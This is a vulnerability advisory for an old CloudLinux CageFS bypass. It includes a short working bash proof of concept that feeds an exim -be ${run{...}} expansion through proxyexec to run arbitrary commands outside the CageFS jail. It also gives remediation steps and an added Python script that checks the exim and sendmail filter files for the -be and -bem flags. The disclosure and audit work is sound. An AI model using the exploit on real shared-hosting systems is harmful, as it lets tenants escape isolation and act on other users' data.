Vulnerability

Affected software: CloudLinux CageFS, unknown version (old vulnerability from around 2016, I no longer have the original report)

CloudLinux CageFS can be bypassed by running exim in expansion testing mode.

Exim in expansion testing mode (-be) can execute commands through the ${run{<command> <args>}{<string1>}{<string2>}} string expansion. The arguments passed to exim -be are not filtered by proxyexec before it executes exim outside CageFS, allowing a user inside CageFS to execute commands outside CageFS.

Exploit

#!/bin/bash
# Proof of concept as originally reported: the command given on the command line
# is run outside CageFS via exim -be string expansion, with its output captured
# in a temporary file inside $HOME and printed back.

if [[ $# -eq 0 ]]
then
    echo "Usage: $0 <command> [arg]..."
    exit 1
fi

OUTPUT_FILE=$(mktemp -p "${HOME}")

# The ${run{...}} expansion is fed to exim -be through proxyexec, which does not filter the -be argument.
echo "\${run{/bin/bash -c \"$@ >${OUTPUT_FILE}\"}{foo}{bar}}" | /usr/sbin/proxyexec -c cagefs.sock "$USER" "$(cat /var/.cagefs/.cagefs.token)" "$(pwd)" EXIM -be
cat "${OUTPUT_FILE}"
rm "${OUTPUT_FILE}"

Solution

Update CageFS to an unaffected version. Check that the -be and -bem parameters are filtered in /etc/cagefs/filters/exim.json and /etc/cagefs/filters/sendmail.json.
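One way to audit the filter files for the two flags named above, as an added example that is not part of the original advisory or of CloudLinux's tooling. The real layout of the CageFS filter JSON is not documented on this page, so the sample documents below are constructed and the loader simply walks every string in the file, whatever its nesting; adapt it if the actual files use a different structure. The check matches whole tokens, because a plain substring grep for -be would be satisfied by -bem alone and report a false pass.

```python
import json
from typing import Any, Iterable, Set

# Constructed sample filter documents (assumed format, not CloudLinux's real schema).
SAMPLE_FILTER_UNPATCHED = {
    "exim": {"restrict_path": "/usr/sbin/exim", "deny": ["-C", "-D"]}
}
SAMPLE_FILTER_PATCHED = {
    "exim": {"restrict_path": "/usr/sbin/exim", "deny": ["-C", "-D", "-be", "-bem"]}
}

# The two exim flags the advisory says must be filtered.
REQUIRED_DENIED = frozenset({"-be", "-bem"})


def collect_strings(node: Any) -> Iterable[str]:
    """Yield every string (keys and values) anywhere in a nested JSON structure."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for key, value in node.items():
            yield key
            yield from collect_strings(value)
    elif isinstance(node, list):
        for item in node:
            yield from collect_strings(item)


def missing_flags(filter_doc: Any, required: Set[str] = REQUIRED_DENIED) -> Set[str]:
    """Return the required flags that do not appear as exact string tokens.

    Exact-token comparison matters: "-bem" present on its own does not cover "-be".
    """
    present = set(collect_strings(filter_doc))
    return set(required) - present


def check_filter_file(path: str) -> Set[str]:
    """Load a filter JSON file from disk and report the flags it fails to list."""
    with open(path, encoding="utf-8") as fh:
        return missing_flags(json.load(fh))


if __name__ == "__main__":
    # Paths from the advisory; on a live host run this as a user that can read them.
    for path in ("/etc/cagefs/filters/exim.json", "/etc/cagefs/filters/sendmail.json"):
        try:
            gaps = check_filter_file(path)
        except FileNotFoundError:
            print(f"{path}: not found")
            continue
        print(f"{path}: {'OK' if not gaps else 'missing ' + ', '.join(sorted(gaps))}")
```

An empty result from missing_flags means both flags are listed somewhere in the document; it does not prove the filter semantics actually deny them, so confirm the vendor's schema before relying on the check.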

Timeline

Unknown (old vulnerability from around 2016; I no longer have the original report, and it was fixed around 2016).